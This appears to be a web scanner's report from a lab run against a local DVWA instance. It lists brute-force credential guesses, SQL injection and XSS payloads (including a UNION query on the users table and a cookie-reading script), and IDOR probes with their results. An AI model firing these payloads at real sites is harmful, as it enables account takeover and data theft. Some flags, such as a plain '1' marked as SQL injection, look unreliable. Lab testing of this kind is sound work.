=============================================
       WebScanPro Security Report
=============================================
Generated: 2026-03-16 18:58:26
Target:    http://localhost:8080/dvwa

Brute Force Results
------------------------------
[ATTEMPT] admin:admin          -> Failed
[ATTEMPT] admin:password       -> SUCCESS
[ATTEMPT] admin:123456         -> Failed
[ATTEMPT] admin:admin123       -> Failed
[ATTEMPT] admin:qwerty         -> Failed
[ATTEMPT] user:user            -> Failed
[ATTEMPT] user:password        -> Failed
[ATTEMPT] root:root            -> Failed
[ATTEMPT] test:test            -> Failed
[ATTEMPT] guest:guest          -> Failed

[VULNERABLE] Weak credentials found: admin:password
Risk: Account takeover possible with default credentials.

SQL Injection Results
------------------------------
1 -> Vulnerable | Severity: Low
' OR '1'='1 -> Vulnerable | Severity: Medium
' OR 1=1 -- -> Vulnerable | Severity: Medium
admin' -- -> Vulnerable | Severity: Medium
' UNION SELECT NULL,NULL -- -> Vulnerable | Severity: High
' UNION SELECT username,password FROM users -- -> Vulnerable | Severity: High
' AND SLEEP(5) -- -> Vulnerable | Severity: High
' AND '1'='2 -> Safe | Severity: None
1 AND 1=1 -> Vulnerable | Severity: Medium
' OR 'x'='y -> Safe | Severity: None

XSS Results
------------------------------
hello -> Not Reflected | Severity: None
test123 -> Not Reflected | Severity: None
<b>bold</b> -> Reflected | Severity: Low
<script>alert(1)</script> -> Reflected | Severity: Medium
<img src=x onerror=alert(1)> -> Reflected | Severity: Medium
<svg onload=alert(1)> -> Reflected | Severity: Medium
<body onload=alert(1)> -> Reflected | Severity: Medium
<script>alert(document.cookie)</script> -> Reflected | Severity: High
<iframe src="javascript:alert(1)"> -> Reflected | Severity: High

Privilege Escalation / IDOR Tests
------------------------------
id=1 -> Accessible | Severity: Medium
id=2 -> Accessible | Severity: Medium
id=3 -> Accessible | Severity: Medium
id=99 -> Not Found | Severity: Low
id=999 -> Not Found | Severity: Low

=============================================
Summary
------------------------------
SQL Injection : 8 vulnerable payload(s)
XSS           : 7 reflected payload(s)
Brute Force   : Credential found
IDOR          : 3 accessible ID(s)
=============================================
